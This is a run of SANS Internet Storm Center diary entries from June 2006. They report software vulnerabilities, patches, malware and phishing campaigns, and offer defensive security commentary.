Published: 2006-06-30

Root-Level Exploit for OSX LaunchD Service

The diary entry from June 28th covered the release of the new version of OS X 10.4.7 which addressed various security issues.  There is now a publicly available exploit taking advantage of the format string vulnerability with the LaunchD daemon in versions of OS X up to and including 10.4.6 which can result in an attacker gaining root access on the system.

You can get more information about the vulnerability and exploit from Security Focus.

If you haven't already installed the update, time to get moving.

Thanks to Juha-Matti for the information.


Published: 2006-06-30

OpenOffice.org Vulnerabilities

OpenOffice.org released a security bulletin today that addresses three security issues in the OpenOffice.org software which were discovered during an internal code audit.  The vulnerabilities affect both the older 1.1.x and the newer 2.0.x releases.  OpenOffice.org has released version 2.0.3 which resolves the issues.  A patch for version 1.1.5 will be available soon.  Without the patch, one of the issues has a possible workaround to alleviate the issue; the other two do not.

OpenOffice.org has additional security notes on their site that address the three specific issues:

  • Java Applets

    It is possible for some Java applets to break out of the secure "sandbox" in which they are normally constrained.  The  applet code could potentially have access to the entire system with whatever privileges the current user has.

    A workaround is provided to temporarily disable support for Java applets.  Instructions are provided for both 1.1.x and 2.0.x.
  • Macros

    A flaw with the macro mechanism could allow an attacker to include certain macros that would be executed even if the user has disabled document macros.  Such macros could potentially have access to the entire system with whatever privileges the current user has.

    There is no workaround for this issue
  • File Format

    A flaw in the parsing of the XML file formats allows for possible buffer overflows in specially malformed documents.  The buffer overflow can crash the OpenOffice.org application and might be exploitable for arbitrary code-execution.

    There is no workaround for this issue.

Thanks to Juha-Matti for the heads-up.


Published: 2006-06-29

iTunes < 6.0.5 vulnerability & patch released

Apple has released an update for iTunes that fixes an integer overflow in the AAC file parsing that can lead to code execution. Y'all want to get this one patched and updated.

APPLE-SA-2006-06-29 iTunes 6.0.5

iTunes 6.0.5 is now available and, in addition to its other content,
fixes the following security issue:

CVE-ID:  CVE-2006-1467
Available for:  Mac OS X v10.2.8 or later, Windows XP / 2000
Impact:  An integer overflow in iTunes could cause a denial of
service or lead to the execution of arbitrary code
Description:  The AAC file parsing code in iTunes versions prior
to 6.0.5 contains an integer overflow vulnerability. Parsing a
maliciously-crafted AAC file could cause iTunes to terminate or
potentially execute arbitrary code. iTunes 6.0.5 addresses this
issue by improving the validation checks used when loading AAC
files. Credit to ATmaCA working with TippingPoint and the Zero Day
Initiative for reporting this issue.


Published: 2006-06-29

Cisco Wireless Access Point Vulnerability Announced

Cisco has released a vulnerability disclosure for their Wireless Access Points:


The vuln is in the web interface for the APs and could allow wiping of the security config and access to the administrative interface without authentication.

To quote Cisco:

A vulnerability exists in the access point web-browser interface when Security > Admin Access is changed from Default Authentication (Global Password) to Local User List Only (Individual Passwords). This results in the access point being re-configured with no security, either Global Password or Individual Passwords, enabled. This allows for open access to the access point via the web-browser interface or via the console port with no validation of user credentials.

The following access points are affected if running Cisco IOS® Software Release 12.3(8)JA or 12.3(8)JA1 and are configured for web-interface management:

  • 350 Wireless Access Point and Wireless Bridge
  • 1100 Wireless Access Point
  • 1130 Wireless Access Point
  • 1200 Wireless Access Point
  • 1240 Wireless Access Point
  • 1310 Wireless Bridge
  • 1410 Wireless Access Point


Published: 2006-06-29

Deja Vu - Advances in Rootkit malware

There are two great analysis of the same piece of improved rootkit malware, Hiding the Unseen at F-Secure's Blog and Raising the Bar: Rustock.A and Advances in Rootkits at Symantec's Blog


Published: 2006-06-29

Always get permission - VA stolen laptop recovered

The recovery of the stolen VA laptop is good news for US Veterans, and the story indicates that the employee blamed for the problem apparently had permission - "Newly discovered documents show that the VA analyst blamed for losing the laptop had received permission in 2002 to work from home on data from included millions of Social Security numbers on a laptop from home." Inquiring minds want to know who are they going to blame now?


Published: 2006-06-28

New version of OSX available

Apple announced yesterday that a new version of OSX (10.4.7) is available and recommended for all users:


To quote the announcement:

It includes fixes for:
- preventing AFP deadlocks and dropped connections
- saving Adobe and Quark documents to AFP mounted volumes
- Bluetooth file transfers, pairing and connecting to a Bluetooth mouse, and syncing to mobile phones
- audio playback in QuickTime, iTunes, Final Cut Pro, and Soundtrack Pro applications
- ensuring icons are spaced correctly when viewed on desktop
- determining the space required to burn folders
- iChat audio and video connectivity, creating chat rooms when using AIM
- importing files into Keynote 3
- PDF workflows when using iCal and iPhoto
- reliable use of Automator actions within workflows
- importing and removing fonts in Font Book
- syncing addresses, bookmarks, calendar events and files to .Mac
- compatibility with third party applications and devices
- previous standalone security updates

SHA1: MacOSXUpd10.4.7Intel.dmg = 2a25ed61d586b71ba7282fb896b2c910785ff358

SHA1: MacOSXUpd10.4.7PPC.dmg= 223d1fc9197a6a96c9d2f2a9110d37abc219c3a6


Published: 2006-06-28

Two new Internet Explorer vulnerabilities disclosed including PoC

Two vulnerabilities in Internet Explorer were published yesterday to the Full-Disclosure mailing list along with their associated PoC code.

A critically rated IE vulnerability in the use of HTA applications (CLSID 3050f4d8-98B5-11CF-BB82-00AA00BDCE0B) to trick a user into opening a file by double clicking it. The file has to be accessible through either SMB or, according to the advisory, WebDAV, and can be located on a remote site.  The currently available version of PoC that was published is limited in that it requires the user to double click on an icon to execute a potentially malicious payload, but we can expect to find creative use of this exploit in the wild very soon.  The workaround for this appears to be disabling active scripting.

The second vulnerability is related to the handling of the object.documentElement.outerHTML property. The abuse of this property will allow an attacker to retrieve remote content in the context of the web page which is being currently viewed by the user. This vulnerability can be potentially nasty as attackers can use it to retrieve data from other web sites user is logged into (for example, webmail) and harvest user credentials.  Several handlers have spent a little more time validating this particular issue and while it is a subtle exploit and rated a lower level risk, this issue has raised some of our neck hairs.

Microsoft is investigating both issues and Secunia posted a PoC web page for the second vulnerability that you can find at http://secunia.com/internet_explorer_information_disclosure_vulnerability_test.

Regarding the second vulnerability, what's interesting is that we were able to reproduce this even when using Mozilla FireFox.

We have not received any reports of these vulnerabilities being actively exploited in the wild. Please let us know if you have more information and we'll update the diary accordingly.

** As another worthy 'Handler tools' mention that is applicable as a general protection tool which has been gaining increased use in the testing of malicious code and reviewing potentially malicious websites is the SandboxIE tool.  Browse safely over to http://www.sandboxie.com.

Bojan Zdrnja
William Salusky


Published: 2006-06-27

Word macro trojan dropper and (another) downloader

We've seen a lot of new malware being spammed in last couple of hours.

First malware exploits an old vulnerability in Microsoft Word, MS01-034 (http://www.microsoft.com/technet/security/Bulletin/MS01-034.mspx). This vulnerability allows an attacker to execute embedded macros no matter what the user set his Microsoft Word to. Of course, as this is a pretty old vulnerability, only terribly outdated installations will be affected. If you are running any newer version of Microsoft Word, macro settings are on High by default so only macros signed by trusted sources are executed - all other macros are disabled. A user would have to change this setting to Medium (so they get asked) or Low in order to run this macro.The Word document comes in a ZIP file and, once executed, installs a Trojan. Detection on the Word document is pretty good at the moment.
The document pretends to list computer prices:

The other malware is a plain old (and boring?) downloader, but we've seen a large number of e-mails being spammed with it. The downloader uses typical social engineering to trick user into opening the archive. Besides the e-mail telling user there's a nice photo in the attachment, the executable name will be like DC0019.JPG__[lots of _]__JPG.exe.
The executable always seems to be in a ZIP archive, but sometimes it is encrypted (and in this case the password is in the e-mail body) and sometimes it's not.

Once executed, the downloader will install on the system and try to download two files:

http://  /img/util/logo_nav.jpg

which is a Symantec logo (more social engineering) and

http:// /flash/menu.swf

this is a site in Korea and the last time we checked the file was not there.

AV detection is pretty low at the moment and only couple of AV products detected this: Symantec, NOD32, Norman, Trend Micro, Sophos. They either detect it as a downloader or generically (Bloodhound.W32.EP in Symantec's case).


Published: 2006-06-27

New Mambo, Joomla releases fix security vulnerabilities

Various security vulnerabilities have been identified in two most popular open source CMS (Content Management System) packages.

All version of Mambo prior to 4.6RC1 are vulnerable to a SQL injection attack in the weblinks.php file. You can patch this manually as only two variables need to be escaped, or you can download patches from the Mambo web site, http://www.mamboserver.com.
We've also received reports that some vulnerabilities in previous versions of Mambo (older than 4.5.3) are being actively exploited, so be sure that you are running the latest version, with the security patch installed. If we get more information about attacks we'll post an update.

New release of Joomla, 1.0.10 also fixes couple of security vulnerabilities. Joomla is also vulnerable to SQL injection attacks, of which 3 rated critical were fixed in the latest release. As the latest version fixes other security vulnerabilities and numerous bugs, users are urged to upgrade. You can find more information on the Joomla web site, http://www.joomla.org.


Published: 2006-06-25

Reminder about MS06-025

The original patch from Microsoft caused issues with dialup.  A new patch was released June 21 (or thereabouts) that addressed this issue.  Exploit code is available that leverages this issue.  This allows an authenticated attacker to execute arbitrary code on Windows 2000 and XP SP2 systems.  Previous versions allow unauthenticated attackers to execute arbitrary code, this you garden-variety "bad-thing(tm)."


Published: 2006-06-25

Excel Issue Scorecard

To help clearly identify the issues, exploit code and remedy related to the recently announce Excel vulnerabilities, I offer this humble correlation.  This information comes from Microsoft, Mitre, and vigilant readers sending in tips.  My thanks go to all.

CVE-2006-3059 aka "Excel Repair Mode" http://www.microsoft.com/technet/security/advisory/921365.mspx
Exploited by: Mdropper.G, Booli.A, Flux.E, Booli.B

CVE-2006-3086 aka "Long Hyperlink"   http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspx
Exploited by: Urxcel.A, and three known public exploit code examples

CVE-2006-3014 aka "Shockwave vulnerability"
Exploited by proof of concept code Flemex.A
The workaround is a killbit


Published: 2006-06-24

Field Day Exercise

Over this weekend, ham radio operators (who aren't at the World Cup) are participating in an annual emergency communications preparations exercise known as Field Day (http://en.wikipedia.org/wiki/Field_day).  It emphasizes the use of emergency and alternative power sources.  In the spirit of this exercise I'm running on backup power today to determine how long my setup will last and work out the bugs.


It has not been going smoothly today, but that's the point of the exercise I suppose.


How long can your critical systems operate without grid power?


Published: 2006-06-23

Sudo For Windows

One of my colleagues sent me a URL today of an interesting utility I have been wishing I had for a while in the Windows environment that I thought I would share with you this evening.  For those of us that learned Unix systems administration prior to dealing with the Windows environment, sudo was one of those tools that made it much easier to compute more safely.  Well, sudo is now available for the Windows operating system as well.  This tool is somewhat different  from the RunAs command in that you use your own passphrase (with the right configuration) to elevate the privledges while running a particular application.  For those Unix geeks out there, RunAs is probably likened to su in some respects.  So if you were ever looking for a Sudo for windows, take a look at http://sudowin.sourceforge.net/ .


Published: 2006-06-22

Malware propagation information from microsoft.

Microsoft recently released a report on the statistics they are collecting via MSRT.

If you need to know what kinds of malware is being detected and removed by the Malicious software removal tool this is a great report. It only covers windows of course but that makes sense.

There is a nice executive summary but please read beyond that. One security trade publication clearly misread the summary and posted a misquote (62% of computers infected with backdoor). That is not what the report states. The 62% number is the percentage of machines that had malware removed from them by MSRT AND had a backdoor installed on them. Restated more then ½ of the machines where an infection was detected and removed also had remote control backdoors on them. No surprise there really. Although there are ways for the hackers to use a system without a backdoor tool installed for the most part the hackers want to be able to remotely upgrade and control systems they have compromised.

The actual report comes from the Rapid Response Team Waggener Edstrom Worldwide.

Overall the report is very good. There are lots of nice charts and graphs. The author did a good job normalizing statistics but also provided the unnormalized view. They don't really mention false negatives until nearly the end of the document. I do not completely agree with their malware categories however since those are well defined up front I had no problem understanding what they meant by email worm, p2p worm, im worm exploit worm, backdoor Trojan, rootkit or virus. They also claim that MSRT is part of a defense in depth even when you have another antivirus package installed. Due to its lack of realtime protection I would say its not defense at all. Its reactive and only comes into play after the fact of infection. Since it is also fairly limited in the malware it detects and the signatures are usually only updated once a month I don't know of any current antivirus package that would miss a virus that MSRT would detect. So I do not agree this provides defense in depth. I do however see serious benifit to running MSRT. It certainally has contributed to the effort of getting infected systems cleaned.

Some other fun facts I gleaned from this report:
MSRT only removes live malware or malware that will be autorun during a reboot.
1 computer in 355 had malware that was recognized and removed.
5% of the root kits removed were WinNT/F4IRootkit (aka the sony root kit) with about 420k removals from 250k machines.
35% of the computer infected were infected via the end user clicking or opening something.
20% of the computers cleaned had been infected sometime in the past. 

So if you have a little time and you are interested in malware propagation I recommend reading this report.


Published: 2006-06-22

isc.org provides attack mitigation

A new version of BIND 9.3.3b1 was recently released. The changes file had one security fix listed. That fix addresses a ddos reflection issue.

Some services respond to potentially spoofed udp packets. 

Upgrade to bind 9.3.3b1.

Drop udp packets from standard services ports 7,13,19, 37 and 464 (echo, daytime, chargen, time, and kpasswd) towards your DNS server(s). You will probably never see any valid queries from such a low port. In general dns queries should be sourced from ports > 1024.

Disable or restrict access to UDP services that don't need to be open to the internet.

Detailed Description:
The basic issue here is very old. It was originally reported in 1999. The CVE number for it is CVE-1999-0103. http://nvd.nist.gov/nvd.cfm?cvename=CVE-1999-0103
"Echo and chargen, or other combinations of UDP services, can be used in tandem to flood the server, a.k.a. UDP bomb or UDP packet storm."  

If you consider DNS to be one side of an "other combination" of UDP services this is not new. What is new is that this version of bind will not send FORMERR packets if the original packet came from the set of well known UDP ports listed above. ISC.ORG has added some code to mitigate attacks with well known spoofed source ports. I do not know of any other DNS software vendor that has added this capability.

7 years ago CERT and others warned us not to leave things like echo and chargen open.
However some OSes and network equipment vendors still ship products with those types of services enabled by default and open to the world. Those services haven't not been in common usage since the 1990's.

From the CHANGES file from 9.3.3b1 source code directory.
--- 9.3.3b1 released ---
1951.    [security]           Drop queries from particular well known ports.


Published: 2006-06-22

Top 100 security tools

Fyodor, the author of Nmap, has released the results of his 2006 network security tool survey. This list is full of tools that can assist in network auditing, defense and forensics. Although it is near the top of my personal list, nmap didn't make the list because Fyodor excluded it. The list includes a short description, cross links leading to categories, intuitive icons to show what OS it runs on natively and icons for availability of source code, GUI, and CLI.
You can find the list at http://SecTools.Org

From that link
`I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also will be pointing newbies to this site whenever they write me saying "I don't know where to start".
Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also means that the list is slightly biased toward "attack" tools rather than defensive ones.'


Published: 2006-06-21

Opera 9 long href PoC

Well, it didn't take long.  Yesterday, Opera 9 came out, today there is a proof of concept for a long href denial of service exploit.  No word on when a patch will be available.


Published: 2006-06-21

Yahoo! Login Server Problems

We have received a number of reports indicating problems with various parts of Yahoo! services (mail, IM, groups). These services all seem to work properly with cached credentials, so we suspect that there is a problem with part of the authentication system.  We have _no_ confirmed information of what is the source of these difficulties, but will continue to monitor and update this diary when more information is available.

ISC Handlers


Published: 2006-06-20

Opera 9.0 released

For those looking for an alternative browser, there is one that has been overlooked a little in the IE-Firefox wars.  Opera has been around for quite a while and works rather well.  Today, they have unveiled version 9.0.  Among the nice features touted in this release is the ability to control pop-ups and javascript on a site-by-site basis.  I haven't had a chance to give this one a thorough testing yet, but would welcome observations from our readers.  The other 2 big players are also scheduled to get new major versions this year, IE7 is in beta and the Mozilla folks are promising Firefox 2 later this year.



Published: 2006-06-20

New Bagle in Encrypted Zip File Attachments

 There is a new Bagle variant making the rounds.  Seems to be spreading slowly.  Email arrives with a .zip attachment that is encrypted with a password.  The password is stored in an image file that is also an attachment.  Anti-virus software that looks for the password in the text won't find it.  More details here: http://www.sophos.com/pressoffice/news/articles/2006/06/baglekl.html


Published: 2006-06-20

Comments on 0day

Given the recent rumors about 0day in IIS and confirmed 0day in several different Microsoft Office applications, these comments seem appropriate.

The first question I pose is: why the sudden increase in vulnerabilities that are published as 0day instead of responsibly disclosed?  This isn't intended to be a comment on full-disclosure.  But if you look over the past couple of years, almost all vulnerabilities that are discovered by actual researchers (not criminals) were disclosed responsibly to Microsoft.  Is the researching community becoming disenchanted with the long Microsoft patch cycle?  Is there more incentive (fame) for researchers to disclose full details to bugtraq or full-disclosure?  Is there more incentive (financial) to sell an exploit to iDefense, 3com, or the highest bidder on eBay?  If you are a software vendor, what are you doing to ensure that vulnerability researchers are kept happy and disclosing security bugs responsibly?

Now here is where I can feel people firing up their flamethrowers.  There has been lots of panic and rumors recently about 0day bugs.  And it isn't just focused on Microsoft products.  We occassionally get e-mail asking if we know about 0day in OpenSSH, Apache, and PHP.  The question shouldn't be whether 0day exists.  Because 0day exists and it will always exist.

The question is whether you or your organization would be the target of such an exploit?  The time is long gone for an exploit author to embed his nice 0day into a worm and let it run rampant through the Internet.  Today, 0day exploits are more likely to be used for military purposes, financial crime, and possibly terrorist activities (although, probably not).

So in reality, the organizations that really need to be concerned about 0day are the ones responsible for protecting military/government assets, financial institutions, and critical infrastructure agencies.  Since you know 0day exists and if you are a target, what are you doing to protect yourself?  How do you protect against, detect, and respond to unknown vulnerabilities?

For the rest of the folks out there (small/medium businesses, hobbyists)... Should you worry about 0day?  Usually not, but if you have all the other critical security components in place then go ahead.

I'm curious to know what kinds of 0day protection systems people have in place?  In the *NIX world, there are some fairly decent (and free) options for protection:  Grsecurity, NSA SE Linux, Systrace, LIDS, ProPolice GCC patch and others.  How about the Windows side?  There doesn't seem to be much for the folks without hardcore $$.  CORE security has something new called Force (http://force.coresecurity.com/) that looks quite promising.  There is also a good list of commercial products for Windows and some comments compiled by fellow handler Jason Lam here: http://isc.sans.org/diary.php?storyid=635

In summary, you should expect 0day to be alive and well for your favorite operating systems, daemons, and applications.  And if it concerns you, then do something about it instead of waiting to get smacked with it later.  You will sleep better at night and not be frustrated at your favorite software vendor when they take 6+ months to patch simple little vulnerabilities.


Published: 2006-06-20

New Excel 0day (Are we evolving or going in circles?)

(Now before I get hatemail from all the Microsoft fanboys out there, please note that these comments are not derogatory towards Microsoft.  Microsoft has like 110% market share according to their research, so that's why they get all the attention.)

Today there is news of another 0day vulnerability in Microsoft Office.  You can check your favorite vulnerability notification service for all the gory details.  Someone wrote asking for comments and honestly I don't have any step-by-step instructions for defending against this specific threat.  All of the general high-level recommendations from the MS Word 0day a couple of weeks ago still apply.  Perhaps we will have something more detailed later when the details are more clear.

Instead, here are some thoughts about the current state of vulnerability discoveries.  If you have followed along with the industry in the last couple of years, you have probably noticed that remote root/administrator type of bugs have slowly disappeared and now seem to be fairly rare.  Most vulnerability researchers that are publishing advisories now seem to focus on web applications and clients (web browsers, Office, etc).  I am honestly expecting to see a healthy stream of client vulnerabilities in Office applications over the next 2-3 years.  Several years ago, nobody cared too much about exploitable bugs in client side applications because remote bugs were still readily available.  Of course, given the recent media attention about the MS Word 0day exploit, alot of vulnerability researchers are now hitting Word with every available fuzzer that they have.

So now we have a scenario where there will be a good number of 0day vulnerabilities discovered in client-side applications like MS Office and OpenOffice.  Users will be advised not to open documents from unknown persons.  So have we evolved?  Or have we just jumped back in time ten years when every aspiring script kiddie was writing VBA Macro viruses?

Keep reading for another article about 0day...


Published: 2006-06-20

The dangers of shared web hosts

A reader alerted us today about yet another web server compromise, affecting a large number of domains. In this particular case, the server was hosted with iPowerWeb, a provider of low cost web space on shared servers.

Space on a shared server is ok for personal use. But you should think twice before using it for commercial, in particular business critical use. Your web sites security will depend on a few hundred other users on the same system doing the right thing. A bad php script on one virtual server could lead to a compromisse of all web sites hosted on the same system.

If you have to use a virtual host, try to follow these tips to make things "as secure as possible":
  • Don't go with the lowest bidder. You still rely on the hosting company to maintain the server and there is not much maintenance that can be done for $1/month.
  • Check references. Look at sites like zone-h.org for defacement history and netcraft.com for stats like uptime.
  • Keep solid backups of your files on a local system!
  • Avoid files and directories that are writeable by anybody but yourself. In particular, avoid files writable by the web server.
  • Do not rely on any access control provided by php/perl/cgi scripts. Other users may bypass it with their own scripts.
If you are providing shared web space, try to follow these rules:
  • know your customers. Avoid handing out accounts before billing details are validated. Try to verify credit card payments by phone.
  • consider virtual systems (xen, vmware...). While not perfect, its a lot better then housing all users on the same system.
  • chrooted user accounts can be almost as good as virtual hosts. But they can be hard to maintain, and they still use the same web server process which may cross over chrooted users.
  • monitor user activity carefully.
  • use a host based IDS to detect intrusions quickly.
  • got backups?


Published: 2006-06-19

Rumors about IIS 6.0 issues

Update: All feedback we received so far points to the microsoft.fr being an isolated issue.

Some persistant rumors talk about a possible new exploit (0-day?) against IIS 6.0. The defacement of experts.microsoft.fr is used as evidence. At this point, we have nothing to support that claim. If you have any additional evidence, please let us know . An image of the alledged defacement can be found at flikr: http://www.flickr.com/photos/affandesign/169734004/in/photostream/. Also see http://www.zone-h.org/content/view/4767/31/ for a mirror of the defacement.


Published: 2006-06-18

Empty emails?

I got the first completely empty email sometime late friday evening, and deleted it without investigating any further. Then I received two more Saturday morning. Now I've gotten almost a dozen, each from a different netblock around the world, and sent to different domains. The SANS NOC has seen 500+. The Internet Storm Center has gotten two queries about them.

There is some speculation it may be malware related, as in a poorly written piece of code spewing out empty emails. One other theory involves confirming known good addresses to seed a new piece of malware or spam. Is this related to Yamanner (sp?)?



Published: 2006-06-18

Excel new vuln FAQ

Update: A perl script was published on Milw0rm, which appears to exploit *some* Excel vulnerability. It creates a spreadsheet inclusing a very long URL. Once the user click on the URL, Excel will crash. As our reader Dominic pointed out, the script does not claim to be the 0day under discussion. Virustotal does not trigger any signatures based on the Excel file generated by the exploit.

Juha-Matti, a regular ISC contributor has written up some information into a FAQ. This is with regards to a recently discovered previously unknown vulnerability in Microsoft Excel. Gotten tired of the phrase '0day'?  I sure have.


Although I do not entirely agree with all of his advice, I think that the first and only defense is - defense in depth.
Do NOT rely solely on antivirus.
Do NOT rely solely on filtering by extension.
Do NOT open Excel files that appear unsolicited in your mailbox.
No single tool or measure is sufficient.

I am hoping that the point is getting accross, do not rely on traditional defensive measures, it is quite likely they will prove inadequate against a custom made targeted trojan built just to penetrate your infrastructure. Particularly using an undisclosed vulnerability. No signature based tool can help you in this case.

(Maddison's Baba)


Published: 2006-06-17

Update on the Paypal Phish Phlaw

According to an article posted at news.com Paypal has fixed the flaw in their website that was reported in yesterdays Diary.

PayPal fixes phishing hole

Thanks to one of our readers for supplying us with the information.


Published: 2006-06-17

Happy Father's Day

I just want to take this opportunity to wish all of the dad's in our reading audience a very Happy Father's Day.  No matter what you do for a living, or what your career path is, we know that you have one of the hardest jobs - being a good dad and good role model for your children and all of the children you come in contact with.  I am proud to say that I serve with some of the best dad's.  The dad's of the Handlers group and all of us care about the future generations. That is one of the reason's that we work so hard at keeping each of you informed about the happenings on the Net.

So to my fellow Handler "guys" I say Happy Father's Day to some of the best dad's I know. To my own dad who will celebrate 72 years next week I say thanks for all you do.  To all of you I say Happy Father's Day.


Published: 2006-06-17

Known Issues for the MS06-025

It appears Microsoft Security Response Center has issued a known issues update to MS06-025.  According to Stephen Toulouse at the Microsoft Response Center Blog the update has broken dial-up scripting for those that are still using dial-ups. 

Microsoft Security Response Blog

Thanks to Juha-Matti for calling this to our attention.


Published: 2006-06-16

Phishes, Phlaws and Phurther Network Phollies

Pay Pal Phlaw?

We've recieved a report of a potential flaw in the PayPal website that is being used to steal credit card and other personal information from PayPal users.

The scam works by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal.

When the victim visits the page, they are presented with a message that has been 'injected' onto the genuine PayPal site that says, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short pause, the victim is then redirected to an external server, (apparently somewhere in Korean IP space) which presents a very convincing fake PayPal Member log-In page.

Logging in sends the PayPal username and password to the bad guys and causes another page asking for more information (social security number, credit card number ...) to remove the limits on the access of thier account.

More to come as we confirm information.

FDIC Phish

Juha-Matti dropped us a link to a newly added US-Cert Advisory detailing a scam targeting customers of FDIC insured institutions.


Published: 2006-06-16

Adobe Reader Update

Adobe has released an update for reader in which "several security bug fixes have been made, with one considered critical for the Macintosh OS and several considered to have a low rating for Windows."

Details can be found on Adobe Support Knowledgebase article 327817


Published: 2006-06-16

Reports of Excel 0-Day

Microsoft has received a report of a new 0-day vulnerability involving Excel.  They are currently investigating this issue and will issue more information on workarounds as it becomes available.  They are currently blogging about it at http://blogs.technet.com/msrc/archive/2006/06/16/436174.aspx so check that site for more information as it becomes available.

In the meantime, we continue to recommend the same defenses we recommended with the Word 0-day from last month located at http://isc.sans.org/diary.php?storyid=1347. These very general best practices should help alleviate the danger until Microsoft releases a patch or more specific workarounds.

Update - We've recieved reports (Thanks Juha-Matti) that Symantec is detecting this attack.

 Trojan.Mdropper.J is the detection for the malicious .xls which uses the 0-day exploit to drop Downloader.Booli.A.

The Symantec website also reports ..

Downloader.Booli.A may arrive on the compromised computer, dropped by Trojan.Mdropper.J, with the following name:


Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

When Downloader.Booli.A is executed, it performs the following actions:

  1. Attempts to run Internet Explorer and inject its code into Internet Explorer to potentially bypass firewalls.
  2. Attempts to download a file from the following location:
    Note: At the time of writing the remote file was not available.
  3. Saves the file as the following and if the download was successful, executes the file:
  4. Creates an empty file before exiting:

We'll pass on more information as we receive it.



Published: 2006-06-15

Potential Patch Problem with MS06-025

We have received some reports of a potential issue with MS06-025.  Here is a snippet of what appears to be the problem as it was report to us:

"We received couple of calls that users are
not able to dial up after applying MS06-025 (KB911280).

I verified this on a test machine and it looks like it breaks dial up.

We have some scripts that need to be run in order to authenticate the user
properly after the dial up connection is established.

It looks like the patch prevents scripts from running at all. Even when I
turned on the terminal window (in interactive logon and scripting) I can't
log in manually at all. After the connection is established I can see the
Username prompt in the terminal window but I can't enter any data.

Uninstalling the patch fixes this."

UPDATE:  The case number and guidance we received from Microsoft has been changed.  Sorry for the initial confusion that some of you may have faced trying to use this case number.   Here is the updated guidance from Microsoft that we have been given.  They want each customer to open their own case. You need to mention MS06-025 breaking dial up and your case will be created and then added to the master case.  The number to use to contact Microsoft for free support, for issues such as these, remains the same:   1-(866) PC-SAFETY.


Published: 2006-06-15

Sendmail Multi-Part MIME Message Handling Denial of Service vulnarability

The new Sendmail vulnerability reported and is cause due to an error in the termination of the recursive "mime8to7()" function when performing MIME conversions. It can be exploited to cause a certain sendmail process to crash when it runs out of stack space while processing a deeply nested malformed MIME message. It can be exploited by malicious people to cause a DoS (Denial of Service). You can apply patch or upgrade to 8.13.7 version.

Affected Version : 8.13.6 and prior.

The additional vulnerability information can be found following sites.


Published: 2006-06-15

E-mails with malicious links targeting Australia

We've received couple of reports about e-mails being spammed which contain browser exploits. What's interesting about this is that they are targeting Australia.

All e-mails we've received have the same content, but the URL seems to be moving around. The body is pasted below:

"People starting panic withdrawals, some of the accounts were reported closed due to technical reasons, many ATMs are not operating. Does it seem that one of the Australia's greatest goes bankrupt? The full story could be found here: <URL>
Well, hope that isn't true... Anyway You'd rather check your balance..."

The URL contains an obfuscated JavaScript. The JavaScript code will check which browser the user is running and will redirect him to the appropriate exploit, served by a CGI script.
The JavaScript will also detect if a user is running Service Pack 2, and append that information as a CGI parameter as well.

The following Internet Explorer vulnerabilities are exploited:


And one Mozilla FireFox vulnerability is exploited as well:


For FireFox user, there is good add-on tool for preventing malicious Javascripts. The add-on tool called "NoScript". You can find more information following site : 


Published: 2006-06-14

Webcast archive available

In case you missed todays ISC Threat Update, the webcast is now available as an archive:



Published: 2006-06-14

Exploits for most recent Microsoft Patches

After yesterday's patchday, we start to receive a number of reports about newly released exploits for vulnerabilities announced on Tuesday.

Here a quick lists of what we have seen so far:

MS06-024: Windows Media Player.
Exploit released by penetration testing vendor to customers.

MS06-025: RRAS
Exploit released by penetration testing vendor to customers.

MS06-027: Word remote code execution
Exploit available before release of patch.

MS06-030: SMB Priviledge Escalation.
Two exploits released to the public.

MS06-032: IP Source Routing Exploit.
DoS exploits released privately (trivial exploit)

Thanks to Juha-Matti for finding the exploits!


Published: 2006-06-13

MS06-029: Script injection through Exchange/OWA

MS06-029 - KB 912442

Affected Software:
  • Microsoft Exchange 2000 Server Pack 3 with the August 2004 Exchange 2000 Server Post-Service Pack 3 Update Rollup
  • Microsoft Exchange Server 2003 Service Pack 1
  • Microsoft Exchange Server 2003 Service Pack 2
Impact:  Remote Code Execution
Severity:  Important
Description:  Microsoft Exchange servers running Outlook Web Access (OWA) to allow clients to remotely check emails are placing their clients at risk to a script injection vulnerability.  A specially crafted email sent to the user and opened with OWA would allow the script to run.  According to Microsoft "A script injection vulnerability exists that could allow an attacker to run a malicious script. If this malicious script is run, it would run in the security context of the user on the client."  If you are running Microsoft Exchange OWA service, it is very important that you patch ASAP. 

If  you have been tracking the issue with Yahoo web mail, this should sound very familiar.
The vulnerability is covered in CVE-2006-1193.

Lorna Hutcheson


Published: 2006-06-13

MS06-031: RPC Mutual Authentication Vulnerability

MS06-031 - KB 917736

This looks to be an obscure bug that only affects Windows 2000.  In               
reality, the conditions for exploitation seem rare and no code execution          
is possible.  The bug only affects custom RPC applications using SSL              
with mutual authentication, which probably doesn't amount to many                 
applications out there.  Finally, the impact of this bug only                     
allows the attacker to impersonate a trusted RPC server - it doesn't              
allow code execution.                                                             
For all the overworked sysadmins, you can probably leave this at the              
bottom of your patch list. 

this vulnerability is also covered in CVE-2006-2380.

Kyle Haugsness


Published: 2006-06-13

MS06-030: Microsoft SMB Vulnerabilities

MS06-030 - KB 914389

MS06-030 covers two vulnerabilities. The more severe one ("SMB Driver Elevation of Privilege Vulnerability") will allow an attacker who has regular user access to a system to gain administrator access. The attack requires some form of regular access, for example valid login credentials or an exploit against a regular user on the system.                   
You could disable the Workstation service to mitigate this vulnerability. However, this is probably only going to work for stand alone workstations. Disabling the Workstation service will break file and printer sharing.                                                              
The second vulnerability ("SMB Invalid Handle Vulnerability") results in a Denial of Service condition, but as the first vulnerability it requires valid login credentials. 

This vulnerability is covered in CVE-2006-2373.

Johannes Ullrich

Published: 2006-06-13

Barracuda Networks outage statement

    A number of readers have written in about problems with their Barracuda Networks mail appliances.  Barracuda networks sent in their public statement:

    "Outage on 6/13/2006 for Barracuda Spam Firewall Customers

